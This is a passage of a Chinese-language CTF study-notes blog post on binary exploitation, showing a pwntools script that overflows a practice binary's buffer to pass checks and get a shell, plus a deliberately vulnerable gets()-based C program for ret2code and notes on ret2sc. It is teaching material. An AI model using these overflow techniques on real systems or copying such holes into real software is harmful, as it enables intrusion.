<p>♟️確認 address<br><img src="https://i.imgur.com/kNIBURF.png"><br>從剛才的<code>cmp</code>那裡可以看到，我們須滿足下面兩個條件<br><code>local_14h = 0xfaceb00c</code><br><code>local_10h = 0xdeadbeef</code></p>
<p>因此我們寫一個 python 去 exploit，去作出下面的結構<br><img src="https://i.imgur.com/1LSvjXw.png"></p>
<p><img src="https://i.imgur.com/YwqSDRI.png"><br>從這裡可以看到我們輸入的地方在第三行，而第二行後還有一個<code>\n</code></p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

r <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./luck'</span><span class="token punctuation">)</span>

r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># 吃掉第一行</span>
r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># 吃掉第二行</span>

r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'a'</span><span class="token operator">*</span><span class="token number">12</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0xfaceb00c</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0xdeadbeef</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true">#p32(0x4->32bytes)</span>

r<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://i.imgur.com/mT0WFW7.png"><br>執行後可以看到我們通過了第一階段</p>
<p>♟️分析第二階段<br><img src="https://i.imgur.com/EsHygvz.png"></p>
<p><code>scanf()</code>有二個參數，第一個參數是 format，我們去看一下<br><code>s 0x400a93</code><br>然後跳到 Hex mode<br><img src="https://i.imgur.com/sEh9bKc.png"><br>在<code>0x40093</code>可以看到它吃的是<code>%d</code>(代表整數)<br>讀一個整數進來後會存到 <code>var_1ch</code><br>剛才有題到 random 會存在 <code>var_ch</code></p>
<p><img src="https://i.imgur.com/BErwebM.png"><br>從這裡可以看到 <code>var_1ch</code> 要等於 <code>var_ch</code><br>雖然我們不知道<code>var_ch</code>是什麼，但我們可以把它覆蓋掉阿~<br>可以把它改成<code>1</code></p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

r <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./luck'</span><span class="token punctuation">)</span>

r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># 吃掉第一行</span>
r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># 吃掉第二行</span>

r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'a'</span><span class="token operator">*</span><span class="token number">12</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0xfaceb00c</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0xdeadbeef</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0x1</span><span class="token punctuation">)</span><span class="token punctuation">)</span> 

r<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<p>接著我們輸入<code>1</code>後就可以拿到 shell 了！<br><img src="https://i.imgur.com/CxOpd3n.png"></p>

    </div>
</div>

<h3 id="ret2code"><a href="#ret2code" class="headerlink" title="ret2code"></a>ret2code</h3><p>透過 Buffer Overflow 改變 return address<br>將 return address 改到 code 中任意處</p>
<blockquote>
<p>須關閉 PIE</p>
</blockquote>
<pre class=" language-cpp"><code class="language-cpp"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>
<span class="token keyword">void</span> <span class="token function">shell</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token function">system</span><span class="token punctuation">(</span>“<span class="token operator">/</span>bin<span class="token operator">/</span>sh”<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">char</span> buffer<span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token function">gets</span><span class="token punctuation">(</span>buffer<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre>
<p>把 return address 覆蓋成 shell 的 address<br><img src="https://i.imgur.com/buf8nSQ.png"></p>
<p>找 shell 的 address</p>
<ul>
<li>shell：<code>% objdump -M intel -d test | less</code></li>
<li>gdb：<code>gdb-peda$ p shell</code></li>
<li>r2：<code>[0x000005d0]&gt; afl~shell</code> (<code>~</code>-&gt;grep)</li>
</ul>
<h3 id="ret2sc"><a href="#ret2sc" class="headerlink" title="ret2sc"></a>ret2sc</h3><ul>
<li>透過 Buffer Overflow 改變 return address</li>
<li>將 return address 改到 <strong>⾃⼰寫的 shell code</strong> 處並執⾏<blockquote>
<p>須關閉 NX</p>
</blockquote>
</li>
</ul>
<p><img src="https://i.imgur.com/KcgnGYF.png"></p>
<p>寫 shell code</p>
<ul>
<li>選有 <strong>rwx</strong> 處</li>
<li>選中間部分 (前後可能有其他用處)</li>
</ul>
<p>Problem</p>
<ul>
<li>漏洞沒利用好</li>
<li>寫的地方蓋到重要東西</li>
<li>shell code 寫壞</li>
</ul>
<link rel="stylesheet" href="/css/spoiler.css" type="text/css"><script src="/js/spoiler.js" type="text/javascript" async></script>
                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Gunjyo</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://gunjyo0817.github.io/2021/08/29/Advanced-CyberSecurity-Day-Note-PWN/">https://gunjyo0817.github.io/2021/08/29/Advanced-CyberSecurity-Day-Note-PWN/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">Gunjyo</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/CTF/">
                                    <span class="chip bg-color">CTF</span>
                                </a>
                            
                                <a href="/tags/Note/">
                                    <span class="chip bg-color">Note</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;Current
            </div>
            <div class="card">
                <a href="/2021/08/29/Advanced-CyberSecurity-Day-Note-PWN/">
                    <div class="card-image">
                        
                        <img src="/imgs/ISIP.jpg" class="responsive-img" alt="2021 Advanced CyberSecurity Day Note - PWN">
                        
                        <span class="card-title">2021 Advanced CyberSecurity Day Note - PWN</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            2021.8.28-8.29 校園資安深耕營Advanced Happy CyberSecurity Day PWN 基礎漏洞分析與測試 筆記
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-08-29
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/note/" class="post-category">
                                    note
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                    <a href="/tags/Note/">
                        <span class="chip bg-color">Note</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/07/22/2021-SCIST-FinalCTF-write-up/">
                    <div class="card-image">
                        
                        <img src="/imgs/SCIST.jpg" class="responsive-img" alt="2021 SCIST FinalCTF write-up">
                        
                        <span class="card-title">2021 SCIST FinalCTF write-up</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            2021 SCIST 第一屆 資安課程季後賽 FinalCTF 的不專業 write-up，rank 1(Official)
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-07-22
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/write-up/" class="post-category">
                                    write-up
                                </a>
                            
                            <a href="/categories/write-up/SCIST/" class="post-category">
                                    SCIST
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                    <a href="/tags/write-up/">
                        <span class="chip bg-color">write-up</span>
                    </a>
                    
                    <a href="/tags/SCIST/">
                        <span class="chip bg-color">SCIST</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <a href="/about" target="_blank">Gunjyo</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">




    <a href="https://www.facebook.com/gunjyo0817" class="tooltipped" target="_blank" data-tooltip=" https://www.facebook.com/gunjyo0817" data-position="top" data-delay="50">
        <i class="fab fa-facebook-f"></i>
    </a>













</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    


</body>

</html>
